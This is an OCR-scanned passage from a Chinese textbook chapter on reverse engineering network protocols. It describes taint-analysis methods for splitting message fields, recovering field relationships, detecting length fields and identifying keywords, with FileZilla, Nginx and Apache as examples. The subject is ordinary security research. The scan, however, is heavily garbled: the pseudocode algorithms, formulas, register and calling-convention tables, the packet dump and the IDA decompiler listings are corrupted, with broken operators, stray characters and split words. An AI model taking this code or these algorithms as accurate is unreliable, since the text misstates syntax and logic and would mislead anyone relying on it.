有 操作 数 为 污点 的 指令 ) ,同时 在 程序 动态 执行 过 程 中 通过 记录 函数 调用 和 退出 来 维持 一 
个 当前 程序 执行 的 动态 调用 栈 。 在 程序 动态 执行 过 程 中 , 当 发 现 输入 消息 的 某 个 字 节 被 
某 条 指令 访问 时 ,就 将 该 指令 的 EIP 和 调用 栈 记录 下 来 。 程 序 执行 结束 后 ,基于 上 述 过 
程 输出 的 一 系列 记录 进行 归并 分 析 , 网 络 输入 消息 的 每 个 字 节 均 得 到 一 个 调用 栈 集合 。 
然后 比较 相 邻 字 节 的 调用 栈 ,对 调用 栈 相同 或 相似 的 相 邻 字 节 进 行 合并 ,最 终 得 到 字段 划 
分 的 结果 ,算法 如 下 : 
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算法 ”基于 调用 栈 的 字段 划分 
输入 : 污点 来 源 标签 集合 T, 分 别 对 应 接收 消息 的 各 个 字 节 
污点 传播 记录 序列 (以 接收 消息 为 污点 源 ,传播 规则 为 数据 依赖 关系 )Tlist, 每 一 个 记录 
t= (o, s, po) (其 中 指令 所 处 理 消息 的 字 节 偏 移 为 o, 指 令 的 调用 栈 为 s, 指 令 序号 为 pc) 
输出 : 字段 切 分 结果 
Define TaintMap- (], T> (g| g€ (1,2, ,N),N- 171}, 污 点 来 源 标签 集合 到 分 组 标识 集合 的 映射 
Tlist-sort by o(Tlist) 
group- 0 
TaintMap[TList[0].0]- 0 
For (i- l;icTList.size();it*)( 
t a-TList[i-1] 
t b-TList(i] 
if(t a.s--t b.s) 
TaintMap[t b.o]- group 
Else 
groupt*; 
TaintMap[t b.o]- group; 
) 
本 节 利 用 该 方法 针对 FTP 协议 实现 FileZilla 的 USER 类 型 消息 以 及 HTTP 协议 实 
现 Nginx 的 GET 消息 进行 了 字段 切 分 实验 ,其 初步 结果 如 图 10-10 至 图 10-12 所 示 。 针 
对 FTP 协议 ,分 隔 符 ( 即 空格 和 回 车 和 用 户 输入 的 用 户 名 (test) 都 依赖 于 字段 切 分 结果 
得 到 。 但 是 在 USER 关键 字 整 体 的 识别 上 还 有 问题 ,还 需要 进一步 添加 优化 规则 。 而 针 
对 HTTP 消息 ,目前 的 规则 基本 能 够 进行 初步 字段 切 分 ,但 是 准确 性 还 是 不 够 ,目前 还 无 
法 区 分 出 GET 关键 字 和 空格 请 求 , 同 时 也 错误 地 将 index 分 成 两 个 字段 ( 首 字母 ;和 


ndex.), 








图 10-11 HTTP GET 请 求 消息 字段 分 隔 树 


基于 调用 栈 比较 的 字段 划分 方法 的 主要 问题 是 : 当 程序 自身 处 理 逻 辑 比 较 复杂 时 ， 
其 输入 消息 字 节 关联 的 调用 栈 会 比较 复杂 ,比如 每 个 字 节 都 关联 多 个 调用 栈 , 相 邻 字 节 调 


E» 软件 安全 分 析 与 应 用 













于 0x2f/ CR 


(a) 无 法 区 分 GET 关 键 字 和 空格 




















(0:02 (ET- x68) CT2:0x743D) C0x6domi dieci 
(b) 将 index 错 误 地 分 成 两 个 字段 
图 10-12 部 分 HTTP 请 求 消息 字段 分 隔 


ED EDID 





用 栈 相似 度 高 ,相同 的 非常 少 等 。 因 此 基于 调用 栈 比 较 的 字段 划分 方法 还 需要 人 工 辅助 
甄别 ,完全 自动 化 还 有 困难 。 

3. 基于 字段 来 源 回溯 的 划分 方法 

基于 字段 来 源 回溯 的 字段 划分 是 指 通 过 查找 发 送 消息 中 各 个 字段 的 构成 来 源 ,并 通 
过 其 差异 来 区 分 字段 的 字段 划分 方法 。 该 方法 首次 由 Dawn Song 团队 四 提出 并 应 用 于 
协议 逆向 分 析 。 与 前 述 两 种 方法 不 同 的 是 ,该 方法 不 是 依据 程序 处 理 接收 消息 的 相关 指 
令 来 探索 协议 字段 结构 ,而 是 在 程序 发 送 某 个 消息 时 ,基于 该 消息 和 发 送 消息 的 指令 进行 
程序 指令 的 反 向 回溯 ,找到 消息 中 各 个 字 节 的 来 源 , 通 过 比较 不 同 该 消息 字 节 的 不 同 来 源 
进行 字段 划分 。 

图 10-13 为 从 FileZilla 客户 端 软件 源 代码 中 节选 的 用 户 登 录 时 所 需要 调用 的 函数 及 
其 参数 ,用 户 发 送 的 消息 位 于 ,此 时 要 发 送 的 消息 是 完整 连续 的 ,因此 无 法 对 其 进行 字 
段 切 分 。 沿 着 调用 栈 回 溯 ( 进 入 上 级 调用 函数 ) 到 位 置 @@, 从 图 中 可 见 ,消息 仍然 是 完整 
的 。 继 续 回溯 (不 进入 上 级 调用 函数 ) ,发 现 消息 是 由 函数 SendCommand 的 参数 buffer 
数组 与 “\r\n” 连 接 而 成 的 。 此 时 ,可 以 将 消息 拆 分 为 两 部 分 , 即 内 容 为 “USER test” 的 
buffer 数组 和 “\rn\n”, 其 中 “\r\n” 为 常量 字符 串 ,无 法 继续 回溯 ,下 面 继续 追踪 buffer 数 
组 的 来 源 。 沿 着 调用 栈 回 溯 到 上 级 调用 函数 (位 置 四 ) ,可 发 现 buffer 由 两 部 分 组 成 , 宽 
字符 常量 数组 “USER” 和 函数 m_pCurrentServer 一 二 GetUser() 调 用 后 的 返回 结果 。 常 
量 数组 "USER” 不 再 追踪 ,下 一 步 继续 查 看 m. pCurrentServer — — GetUser O (位置 @)， 
该 函数 的 返回 结果 为 CServer 类 对 象 的 一 个 成 员 变 量 ,追踪 结束 。 以 上 追踪 过 程 如 
图 10-14 所 示 。 

上 面 已 经 在 可 读 性 较 强 的 源 代码 中 逐 层 追溯 出 了 特定 消息 “USER test” 中 各 个 字段 
的 来 源 , 即 字 符 串 “USER” 和 空格 字符 都 是 源 代码 中 预 置 的 常量 ,“test” 是 其 用 户 名 。 前 
面 已 经 介绍 过 的 程序 切片 技术 可 以 用 来 获得 上 面 的 结果 , 即 对 “USER test” 字 符 串 中 的 
每 个 字 节 进行 动态 后 向 数据 切片 ,算法 描述 如 下 : 
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Server.cpp: CServer::GetUser() const. 

(S)257:returnm user; 

Ftpcontrolsocket.cpp: CFTPControlSocket::LogonSend. 

(4) 1064:res = SendCommand( T( “USER " )tm pCurrentServer-»GetUser(); 
调用 Ftpcontrolsocket.cpp: CFTPControlSocket::SendCommand 


(3) 1183: wxCharBuffer buffer = ConvToServer(str- T( ^n" )); 
(2) 1190:bool res = CRealControlSocket::Send(buffer, len); 

调用 ControlSocket. cpp: CRealControlSocket: :Send 
(D875: int written= m pBackend-^Write(buffer, len, error); 





图 10-13 FileZilla FTP 客户 端 中 USER 消息 的 来 源 回溯 









































DHM 句 用 户 输入 
| USER test 
Sues i 
a | USER test © [wa] 
NG \ "A z 


"d 


5 
© | "USERtest Win 


图 10-14 基于 源 代 码 的 字段 来 源 追踪 示意 


算法 ”基于 发 送 消息 来 源 回溯 的 字段 划分 
输入 : 程序 启动 开始 到 发 送 消息 m 之 间 所 有 的 指令 记录 T 
发 送 消息 中 每 个 字 节 到 其 后 向 数据 切片 的 映射 m_sliceMap 
输出 : 字段 划分 结果 s 
Begin 
For m byte in m: 
m sliceMap[m byte]-backward dataslice(m byte, T) 
group- 0 
For (i-l;i«m.size();i*t*)( 
slice prev-m[i- 1] 
slice cur-m[i] 
if (TypeEqual(slice prev.last, slice cur.last)) 
S[m[i-1]]- group 
Else 
groupt*; 
S[n[i-1]]- group; 
} 
End 


1022 字段 间 关系 的 识别 


字段 间 关系 识别 是 指 基 于 字段 划分 结果 进一步 区 分 出 不 同 字段 之 间 相 邻 、. 并 列 以 及 
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从 属 等 关系 。 通 过 字段 间 关 系 构建 字段 所 在 消息 的 完整 格式 语法 树 ,能够 更 清晰 简明 地 
表达 整个 消息 的 语法 结构 。 

由 于 FTP 协议 的 消息 格式 无 法 有 效 体 现 分 隔 符 的 作用 (大 多 数 只 包含 两 个 部 分 , 即 
命令 和 命令 参数 ) ,因此 本 节 将 以 HTTP. 协议 为 例 讲 解 字段 间 关 系 的 识别 方法 。HTTP 
协议 在 RFC 2616 中 作为 正式 规范 发 布 ,由 第 三 方 厂商 提供 实现 。RFC 规范 用 BNF 范 
式 器 ( 是 一 种 形式 化 地 表示 上 下 文 无 关 文法 的 语言 ,常用 于 计算 机 编程 语言 ,文档 格式 以 
及 通信 信息 的 规范 化 表示 ) 形 式 化 地 描述 协议 的 消息 格式 ,如 下 所 示 : 


HTTP-message- Request | Response 
generic- message = start- line 
* (message- header CRLF) 
CRLF 
[ message- body ] 
start-line -Request- Line | Status- Line 
message-header -field- name ":" [ field- value ] 
message- body —-entity- body|« entity- body encoded as per Transfer- Encoding» 
Request- Line -Method SP Request- URI SP HTTP- Version CRLFMethod- "OPTIONS" | "GET" | " 
HEAD" | "POST" | "PUT" | "DELETE" | "TRACE" | "CONNECT" | extension- method 
Request- URI -"*" | absoluteURI | abs path | authority 


若 一 个 字段 无 法 划分 为 更 多 字段 , 则 称 该 字段 为 基本 字段 (如 HTTP 请 求 中 的 “ 方 
法 ”字段 ) ,反之 则 为 非 基 本 字段 (如 HTTP 请 求 中 的 “ 首 行 "字段 )。 字 段 间 关系 主要 表现 
为 从 属 .并列 、 关 联 等 。 

本 节 将 重点 对 HTTP 请 求 (Request) 类 型 的 消息 进行 分 析 , 该 类 型 消息 的 组 成 结构 
如 图 10-15 所 示 。 该 类 型 消息 由 首 行 、 可 选 的 一 个 或 多 个 消息 头 (message-header) 以 及 请 
求 内 容 组 成 。 其 中 首 行 又 由 方法 .URL、 协 议 版 本 等 字段 组 成 ,CRLF( 回 车 换行 ) 是 分 
隔 符 。 





HTTP 请 求 

















首 行 消息 头 CRLF 消息 头 CRLF i CRLF | ERAR | 


"a nc 























一 X 


[方法 URL 版 本 | CRLF] 
图 10-15 HTTP 请 求 消息 格式 组 成 结构 

















基本 字段 和 非 基 本 字段 都 可 以 从 属于 其 他 非 基 本 字段 ,如 “方法 "字段 从 属于 “ 首 行 ” 
字段 。 字 段 可 以 和 其 他 属于 同一 个 非 基 本 字段 的 字段 形成 并 列 关 系 ,如 “方法 ”字段 和 
“URL” 字 有 段 是 并 列 关系 ,“ 首 行 ”字段 与 “消息 头 ” 字 段 也 是 并 列 关系 。 显 然 ,字段 间 通过 
从 属 关系 和 并 列 关系 就 可 以 形成 图 10-15 所 示 的 消息 格式 树 。 字 段 间 的 关联 关系 比较 复 
杂 , 往 往 依 赖 于 字段 的 语义 ,简单 的 如 长 度 字段 ,表示 该 字段 的 值 是 另外 一 个 字段 的 字 节 


第 人 D 章 “网 络 协议 逆向 分 析 


长 度 , 复 杂 的 如 HTTP 请 求 中 的 “版 本 ”字段 ,表示 后 续 消 息 格式 的 组 成 结构 ,基本 上 该 字 
段 和 大 多 数字 段 都 存在 关联 关系 。 

笔者 搭建 了 Nginx HTTP 服务 器 ,并 用 Wireshark 截获 了 HTTP GET(GET 是 
HTTP 消息 * 方 法 ?字段 的 一 个 可 选 值 ) 请 求 的 访问 流量 ,原始 请 求 消息 如 图 10-16 所 示 。 
Wireshark 软件 自 带 了 协议 消息 结构 解析 器 ,因此 能 够 将 消息 的 结构 呈现 出 来 ,如 
图 10-17 所 示 , 其 中 第 一 行为 “ 首 行 ”", 接 下 来 的 4 行为 4 个 “消息 头 ” 和 相应 的 回 车 换行 
符 , 接 着 又 是 一 个 单独 的 回 车 换行 符 , 以 后 是 消息 内 容 。 由 于 GET 请 求 消息 没有 内 容 ， 
因此 这 里 的 消息 内 容 字段 为 空 。 本 节 的 字段 关系 识别 将 致力 于 恢复 出 上 文 提 到 的 消息 内 
部 结构 ,包括 字段 间 的 从 属 关系 .并列 关 系 和 简单 的 关联 关系 。 


0000 52 54 00 12 34 56 52 55 0a 00 02 02 08 00 45 00 
0 

92 Of e7 15.00.00 0058 de 02 43 bO 8b 

54 69 6e 





$ Internet Protocol Version 4, Src: — 一 2 一 (10.0.2. ze Dst 
@ Transmission Control Protocol, Src Port: 59211 (59211), Dst Mm 一 (80), Seq: 1, Ack: 1, Len: 124 
a 
国 

User-agent: wget/1.13.4 (linux-gnu) ^n 

Accept: */*\r\n 

Host: 127.0.0.1:5555 rn 

Connection: Keep-Alive\r\n 

Mn 


[HTTP request 1/1] 


图 10-17 Wireshark 对 HTTP 请 求 消息 的 解析 结果 


字段 间 关系 识别 将 基于 10. 2. 1 节 字 段 切 分 的 结果 ,对 各 个 字段 之 间 的 从 属 . 并 列 和 
关联 关系 进行 识别 界定 。 

基于 二 进 制 指令 执行 序列 进行 字段 关系 恢复 和 10. 2. 1 节 字 段 划分 使 用 的 技术 和 方法 
类 似 ,也 将 基于 程序 执行 监控 和 污点 传播 技术 获取 与 网 络 输入 消息 相关 的 所 有 指令 ,通过 分 
析 指 令 信息 获取 输入 消息 内 各 个 字 节 之 间 的 关联 信息 ,实现 字段 关系 的 识别 。 字 段 分 隔 时 
采用 的 方法 经 过 进一步 研究 和 调整 能 够 用 于 字段 关系 的 识别 ,分 别 是 基于 分 隔 符 作 用 域 的 
字段 关系 恢复 方法 以 及 基于 消息 处 理 指令 上 下 文 差 异 的 字段 关系 恢复 方法 。 由 于 基于 上 下 
文 差 异形 成 的 字段 树 能 够 直接 反映 字段 关系 ,因此 本 节 仅 对 前 者 进行 介绍 。 此 外 ,由 于 长 度 
关系 是 一 种 比较 常见 的 字段 关系 ,本 节 还 对 长 度 字段 的 识别 方法 进行 了 补充 介绍 。 

1. 基于 分 隔 符 作用 域 的 字段 关系 恢复 

针对 大 多 数 包 含 分 隔 符 的 文本 文件 ,分 隔 符 的 识别 不 仅 能 够 用 于 字段 划分 ,还 能 在 某 
种 程度 上 有 助 于 识别 字段 之 间 的 关系 中 。 分 隔 符 识别 时 主要 考察 特定 字符 是 否 与 输入 消 
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息 ( 污 点 标签 ) 的 多 个 连续 字 节 进行 比较 ,其 中 只 要 求 有 多 个 连续 比较 记录 即 可 ,没有 对 该 
字符 的 比较 记录 做 进一步 分 析 , 后 面 将 以 比较 记录 为 主要 依据 探究 字段 关系 恢复 的 线索 。 
本 节 引 入 分 隔 符 作 用 域 的 概念 , 即 分 隔 符 与 输入 消息 (污点 标签 ) 的 字 节 序列 做 连续 
比较 的 范围 ,如 果 定义 分 隔 符 为 ;, 污 点 标签 为 (i 二 1,2,…,n) ,谓词 CmpTaint(s, 4;) 表 
示 分 隔 符 s 与 污点 标签 1; 作 过 比较 ,分 隔 符 作用 域 Range(s) 的 形式 化 定义 如 下 : 
RangeG) — (jj 1.7 ,j++k|CmpTaint(s ,t+i) 10.1.74) 
由 定义 可 看 出 ,分 隔 符 的 作用 域 必须 连续 ,因此 需要 剔除 单独 的 比较 记录 。 作 为 例子 ， 
下 面 给 出 前 述 Nginx 服务 器 处 理 GET 消息 时 提取 的 各 个 分 隔 符 的 作用 域 ,如 表 10-4 所 示 。 
表 10-4 Nginx 服务 器 处 理 HTTP GET 消息 的 分 隔 符 作用 域 








分 隔 常 数 作 用 域 分 隔 常 数 作 用 域 
"Ar"; 0xA [0,25] ud [4.15] 
* ^. 0x20 [0,23] iu [4.9] 














由 表 10-4 可 见 ,分 隔 符 的 作用 域 之 间 形 成 了 包含 关系 ,如 *. "分隔 符 的 作用 域 包含 了 
“/” 分 隔 符 的 作用 域 ,一 个 合理 的 解释 是 字段 /index” 属 于 “/index. html” 字 段 , 这 个 解释 
也 符合 HTTP 协议 的 语义 。 由 此 就 能 够 经 验 性 地 给 出 字段 间 从 属 关系 的 判别 方法 。 若 
两 个 字段 同属 于 一 个 字段 ,同时 这 两 个 字段 的 作用 域 也 没有 重 释 , 则 这 两 个 字段 之 间 是 并 
列 关 系 。 本 节 给 出 基于 分 隔 符 的 从 属 字段 关系 识别 方法 如 下 (如 果 两 个 字段 没有 从 属 关 
系 则 视 其 为 并 列 关系 ) ,其 中 R 保存 了 字段 之 间 的 关系 。 


算法 ”基于 分 隔 符 的 字段 关系 识别 
输入 : 分 隔 符 集合 s 
SepRangeMap: S-» (Range(s.)| si€ S) // 字 节 分 隔 符 到 其 作用 域 的 映射 ,由 分 隔 符 
// 比 较 记录 集 合 获取 
// 污 点 来 源 标签 集合 了 ,分 别 对 应 接收 消息 的 各 个 字 节 
输出 : 字段 关系 映射 R : { <s,a> 一 工 | 31,3)€ 5,r€ {0,-1,1}} 
Begin 
// 父 子 关系 
For si ，Range (si ) in SepRangMap: 
For sj, Range(s;) in SepRangMap: 
If Range (s: ) 真 包含 于 Range (5) : 
R(s,,5,)-1 
Else if Range (5 ) 真 包含 于 Range (si) : 
R(s,s)-1 
Else if Range(s;) A Range(s;) !- (2: 
R(3,,9))--1 
Else if Range(s;) A Range (s;)--(Z: 
R(si ,si)=0 
End For 
End For 
End 
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2. 长 度 字段 的 识别 

长 度 字段 是 网 络 协议 中 常用 的 一 种 字段 ,该 字段 用 来 表示 另外 一 个 字段 的 长 度 。 如 
HTTP 协议 中 头 部 结构 (HTTP Header) 中 的 Content-Length 字段 ,该 字段 表示 HTTP 
请 求 中 消息 内 容 ( 除 头 部 结构 外 其 他 部 分 ) 的 长 度 。 

长 度 字段 一 定 与 另外 一 个 字段 相关 联 , 本 节 将 该 关联 字段 称 为 目标 字段 。 在 微观 指 
令 层面 ,程序 员 使 用 长 度 字 段 通常 的 模式 是 : 通过 循环 来 遍历 目标 字段 时 ,使 用 长 度 字段 
构建 循环 结束 条 件 。 这 个 模式 针对 结束 条 件 还 有 两 种 具体 情况 : 一 种 是 在 循环 中 递减 长 
度 字 段 , 当 长 度 字段 为 零 时 退出 循环 ; 另 一 种 是 在 循环 前 预先 计算 出 目标 字 节 的 尾部 位 
置 , 每 次 循环 都 判断 当前 访问 区 域 是 否 越界 。 

如 上 所 述 , 针 对 长 度 字段 的 这 种 使 用 模式 ,必须 掌握 初步 的 循环 识别 能 力 , 同 时 能 够 
判断 某 条 指令 是 否 属于 一 个 循环 ,以 及 获取 循环 的 开始 和 结束 条 件 等 。 

识别 长 度 字段 的 第 一 步 需 要 识别 循环 ,常见 的 循环 识别 方法 有 基于 跳 转 回 边 识别 方 
法 .基于 重复 出 现 的 相同 跳 转 目的 地 址 的 识别 方法 和 基于 指令 块 重复 的 识别 方法 ,如 
图 10-18 所 示 。 循 环 识别 还 要 考虑 不 同 循环 嵌 套 的 问题 ,如 图 10-19 所 示 。 本 文 不 详细 
讨论 复杂 情况 下 循环 识别 的 算法 ,只 使 用 目前 较为 简单 的 基于 跳 转 回 边 的 识别 方法 。 循 
环 识别 完成 后 ,同时 还 需要 获得 两 类 信息 : 作为 循环 结束 条 件 的 比较 指令 ,每 条 指令 所 属 
循环 的 集合 。 






















































































inc eax inc eax inc eax 
inc ebx inc ebx inc ebx 
mov[ebx],eax mov[ebx],eax mov[ebx],eax 
cmp eax,3 emp eax,3 
Jne 0x0 Jne 0x0 E 
inc eax 
inc eax me 
Ace mov[ebx],eax 
mov[ebx],eax 5 
cmp ebx,10 inc eax 
Jne 0x0 inc ebx 
mov[ebx],eax 
图 10-18 ”循环 识别 方法 
ü 5 
A B 
B B 循 环 A 
3 次 [B] 
B 
= E = C A[B]C 
B A 循环 3 次 
A 
B B 循 环 B 
B 2 次 C 
[s] E 
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在 通过 静态 分 析 完 成 循环 识别 后 ,可 以 针对 动态 执行 获取 的 指令 记录 进行 分 析 , 找 到 
其 中 既是 循环 结束 点 ,同时 又 与 输入 相关 (污点 相关 ) 的 指令 ,与 该 指令 相关 的 网 络 输入 消 
息 字段 就 是 可 能 的 长 度 字 段 。 同 时 ,为 了 进一步 提高 准确 性 ,查看 这 些 疑 似 长 度 的 字段 是 
否 在 每 次 循环 中 都 被 引用 到 。 最 后 ,如 果 疑 似 字段 能 够 形成 连续 的 字 节 区 域 , 则 该 字 节 区 
域 就 是 长 度 字段 。 关 于 这 部 分 内 容 , 读 者 可 参考 Polyglot 的 相关 资料 。 


1023 字段 功能 语义 恢复 


字段 功能 语义 恢复 是 指 通过 软件 逆向 分 析 恢 复出 目标 网 络 协 议 中 各 个 消息 每 个 字段 
的 功能 、 用 途 等 语义 信息 。 比 如 HTTP 的 GET 字段 指定 了 该 协议 的 一 种 消息 类 型 ,FTP 
请 求 的 USER 代表 该 消息 包含 了 用 户 登 录 认证 提交 的 用 户 名 。 

本 节 的 字段 功能 语义 恢复 要 解决 的 核心 问题 是 : 针对 网 络 协议 的 未 开源 二 进 制 实 
现 ,获取 其 消息 中 各 个 字段 的 功能 语义 。 

字段 功能 语义 恢复 要 获取 具体 字段 的 语义 ,可 以 依赖 的 信息 包括 协议 实现 自身 .运行 
环境 .底层 操作 系统 以 及 底层 硬件 提供 的 语义 信息 。 其 中 底层 硬件 主要 是 指 CPU 内存 
等 底层 硬件 可 提供 的 语义 信息 ,该 类 信息 比较 多 ,但 语义 信息 有 限 ,包括 CPU 硬件 信息 
(各 寄存 器 的 一 般 用 途 ,EAX 为 函数 返回 值 ,如 LOOP 循环 中 ECX 通常 为 计数 器 ,通过 
在 循环 入 口 读 取 ECX 的 值 可 获取 某 些 比较 简单 循环 的 次 数 , 如 表 10-5 所 示 )。 在 不 同 的 
使 用 环境 中 各 个 寄存 器 以 及 寄存 器 的 值 还 往往 被 赋予 不 同 的 语义 信息 ,而 且 针 对 不 同 的 
编译 器 往往 有 不 同 的 语义 。 如 针对 不 同 的 调用 约定 (调用 约定 描述 了 函数 调用 的 接口 规 
范 , 包 括 参 数 传递 和 保存 方法 、 堆 栈 的 处 理 方法 、 调 用 完成 后 的 恢复 方法 等 ), 其 寄存 器 的 
语义 如 表 10-6 所 示 。 

表 10-5 Windows 平台 CPU 各 寄存 器 语义 信息 


























5 f 器 Intel 手册 提供 的 原始 语义 
EAX 累加 器 寄存 器 ;RET 指令 返回 值 
ECX LOOP 指令 循环 长 度 
EDX 除法 指令 的 余数 
EBX 内 存 寻 址 的 基地 址 
ESI rep mov 指令 源 地 址 
EDI rep mov 指令 目的 地 址 
EBP 框架 指针 
ESP 栈 指针 
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510-6 调用 约定 中 函数 语义 和 寄存 器 的 对 应 关系 











调用 约定 Windows MSVC cdecl Borland fastcall Linux 内 核 系统 调用 
第 参数 ,EAX | 第 二 参数 EM 
调用 参数 。 | [ebp 十 8+4* 参数 索引 ] | Ropa nex xem. BCX 
其 余 参数 人 栈 : | 
返回 值 EAX EAX EAX 














非 开 源 协议 实现 自身 所 能 提供 的 语义 信息 非常 有 限 , 主 要 原因 是 软件 厂商 出 于 自身 
软件 安全 防护 和 版 权 保护 的 根本 利益 ,不 愿意 提供 可 以 被 轻易 逆向 的 实现 代码 ,在 软件 编 
译 阶段 去 除了 大 部 分 调试 符号 信息 ,例如 图 10-20 中 的 两 个 反 编译 汇编 代码 是 同一 个 编 
译 器 分 别 用 不 同 的 编译 选项 生成 的 ,一 个 保留 了 调试 符号 信息 , 另 一 个 去 除了 调试 符号 信 
息 ,并 分 别 用 IDA 反 编 译 生成 C 语言 代码 。 

本 节 首 先 针对 表征 协议 消息 功能 的 关键 字 的 识别 进行 介绍 ,并 继而 对 能 够 恢复 其 他 
字段 部 分 语义 的 方法 进行 介绍 。 

1. 基于 字符 串 比 较 指令 分 析 的 关键 字 识 别 

关键 字 是 协议 规范 中 规定 的 具有 特定 含义 的 字段 ,通常 以 常量 字符 串 的 形式 定义 ,如 
HTTP 协议 中 表示 请 求 消息 类 型 的 GET 常量 。 

本 节 的 关键 字 识 别 方法 同样 是 主要 针对 网 络 协议 的 二 进 制 实现 对 网 络 输入 消息 的 处 
理 来 提取 协议 关键 字 。 协 议 规范 用 代码 实现 过 程 中 对 于 关键 字 的 识别 判断 往往 基于 字符 
串 比 较 , 如 图 10-21 中 的 代码 所 示 。 

关键 字 识 别 操作 基于 字符 串 比较 的 二 进 制 指令 特征 ,结合 污点 传播 方法 追踪 输入 消 
息 与 特定 字符 串 比 较 的 指令 ,从 中 提取 出 可 能 的 关键 字 。 该 方法 的 介绍 可 参见 
Polyglot? 。 该 方法 与 前 文 的 分 隔 符 提 取 方 法 类 似 , 都 是 提取 与 网 络 输入 消息 相关 的 比 
较 指 令 ,不 同 之 处 在 于 关键 字 中 的 字符 不 会 像 分 隔 符 那 样 与 其 作用 域内 的 字符 都 做 比较 。 

依靠 比较 范围 (作用 域 ) 还 难以 完全 剔除 非 关键 字 分 隔 符 的 干扰 ,下 一 步 如 果 将 比较 操 
作 的 结果 纳入 考察 范围 ,就 会 发 现 所 有 关键 字 的 比较 指令 的 结果 都 是 成 功 的 ,这 也 符合 程序 
员 开发 的 逻辑 ,因此 可 以 将 检索 识别 范围 缩小 到 所 有 指令 执行 结果 为 成 功 的 比较 指令 。 

仅仅 依靠 比较 指令 记录 还 不 能 确保 得 到 的 字符 串 为 关键 字 。 例 如 在 协议 通常 都 具备 
的 用 户 名 和 密码 验证 过 程 中 ,用 户 名 字符 串 要 和 系统 已 知 的 用 户 名 做 比较 ,此 时 该 用 户 名 
可 能 被 误 认 为 关键 字 , 密 码 作 为 字符 串 比较 时 也 有 类 似 情 况 。 此 外 ,针对 校 验 值 比 较 等 情 
况 也 存在 误 判 可 能 。 这 里 引入 一 个 假设 条 件 , 即 关键 字 字 符 串 以 静态 明文 形式 (也 称 硬 编 
码 ) 存 在 于 原始 二 进 制 文件 中 ,大 多 数 程序 均 以 常量 字符 串 的 形式 定义 和 引用 关键 字 , 因 
此 可 以 在 目标 软件 中 搜索 前 一 步 得 到 的 所 有 潜在 关键 字 字 符 串 ,能 够 匹配 的 字符 串 则 识 
别 为 关键 字 。 由 此 可 将 关键 字 识 别 的 方法 总 结 如 下 : 

CD. 提取 所 有 与 输入 消息 相关 的 程序 指令 。 

(2) 从 第 (1) 步 提取 的 指令 记录 中 进一步 筛选 出 所 有 执行 结果 为 成 功 的 比较 (CCMP， 
TEST) 指 令 记 录 。 
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oid _ thiscall CControlSocket::0nReceiue(CControlSocket «this, int nErrortoi 


CControlSocket *u2; // esi@1 

intő} v3; // qax@4 

int v^; // edi& 

void »u5; // eax@9 

void *v6; // ebx@9 

int v7; // eax@9 

unsigned — int8 v8; // cf@12 

int v9; // edi@13 

signed int v10; // eax@14 

char v11; // cl@18 

int v12; // [sp*Ch] [bp-3uh]81 

int v13; // [sp*10h] [bp-30h]GA 
CStdStr&char? thisa; // [sp*14h] [bp-2Ch]826 
unsigned int v15; // [sp*2Ch] [bp-12h]G1 
int v16; // [sp*3Ch] [bp-ih]G26 





v15 = (unsigned int)&u12 
v2 - thi 
if ( fth: 
Hd 

vi2 - 500; 

v3 = CControlSocket::GetSpeedLimit(this, upload); 

v13 = HIDWORD(u3) 


. security cookie; 





»m antiHammeringWaitTime ) 











vh = v3; 
if ( fo3 ) 
CControlSocket::ParseConnand(v2) ; 
return; 
H 
if ( v3 < 500 && (HIDUORD(u3) & (unsigned int)u3) t= -1 ) 
v12 = v3; 
v5 = operator neu (OxíFAu); 
(a) 带 调试 符号 
int — thiscall sub 446C28(void *this, int a2) 


€ 
int result; // eax&1 
int v3; // esie1 
signed  intóh vh; // qaxg 
int v5; // edi@s 
int vó; // eax@9 
void »v7; // ebx@9 
int v8; // eax@9 
unsigned — int8 v9; // cf@12 
int v10; // edi@13 
signed int v11; // eax@14 
char v12; // cl@18 
int v13; // [sp*18h] [bp-3uh]81 
int vts; // [sp*ihh] [bp-30h]G^ 
int v15; // [sp*18h] [bp-2Ch]826 
int v16; // [sp*28h] [bp-1Ch]G28 
unsigned int v17; // [sp*2Ch] [bp-18h]G26 
unsigned int v18; // [sp*30h] [bp-iuh]G1 
int v19; // [sp*38h] [bp-Ch]81 
int v20; // [sp*h6h] [bp-Ah]G26 








v18 = (unsigned int)&v13 ^ — security cookie; 
result = (int)&v19; 

v3 - (int)this; 

if ( f*(( DUORD «)this + 613) ) 

si 


v13 = 500; 

LODUORD(uA) = sub h3EFEO(1); 

vih = HIDMORD(uA); 

v5 = Uh; 

if ( foh ) 
return sub h49710(03); 

if ( v^ < 500 && (HIDUORD(uA) & (unsigned int)uh) t= -1 ) 
v13 = vh; 

v6 = sub !19BhD(588 





(b) 去 除 调试 符号 
图 10-20 ”编译 选项 对 反 编 译 代码 可 读 性 的 影响 
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switch (len) 
t 


case 3: 
switch (method[0]) 


case 'P': 
return (method[:] == 'U' 
&& method[?] == 'T* 
? M PUT : UNKNOWN | 
case 'G': 
return (method[1] == 'E' 
&& method[2] == 'T' 
?M_GET : UNKNOWN METHOD); 
default: 
return UNKNOWN METHOD; 


METHOD); 








图 10-21 Apache HTTP 服务 器 接收 消息 时 识别 GET 关键 字 


(3) 从 比较 指令 中 提取 可 能 的 关键 字 字符 串 。 

COD 对 于 每 个 可 能 的 关键 字 字 符 串 ,静态 扫描 目标 程序 二 进 制 文件 。 

关键 字 的 识别 综合 利用 底层 硬件 信息 (如 指令 执行 结果 等 ) 和 协议 实现 自身 的 信息 
(静态 二 进 制 文件 内 容 ) ,采用 污点 分 析 技 术 。 关 键 字 识别 主要 依赖 于 关键 字 使 用 时 的 微 
观 指令 特征 ,这 个 特征 的 形成 主要 依赖 于 程序 员 开 发 实践 习惯 和 编译 器 目标 代码 生成 这 
两 方面 ,任何 一 方面 的 变化 都 可 能 造成 关键 字 识别 的 失败 。 例 如 ,针对 程序 员 开 发 实践 的 
变化 ,车 程序 员 对 关键 字 的 使 用 做 了 适当 混淆 ,在 文件 中 以 混淆 形式 存在 ,关键 字 比 较 前 
进行 解 混淆 ,这 种 情况 将 导致 无 法 关键 字 识 别 失败 。 

2. 基于 运行 环境 语义 的 字段 语义 恢复 

本 节 的 软件 运行 环境 主要 是 指 软件 运行 直接 关联 的 提供 运行 支持 的 运行 时 功能 库 软 
件 、 底 层 操作 系统 和 其 他 相关 软件 。 典 型 的 软件 运行 环境 信息 如 表 10-7 所 示 。 

表 10-7 常见 软件 运行 环境 一 览 














操作 系统 基础 功能 库 软 件 其 他 扩展 功能 库 (TLS 实现 为 例 ) 系统 调用 
Windows Es Mies BEI TRE; OpenSSL Ntdll. dll(pdb) 
Linux GLIBC, JRE, Python GnuTLS System. map 
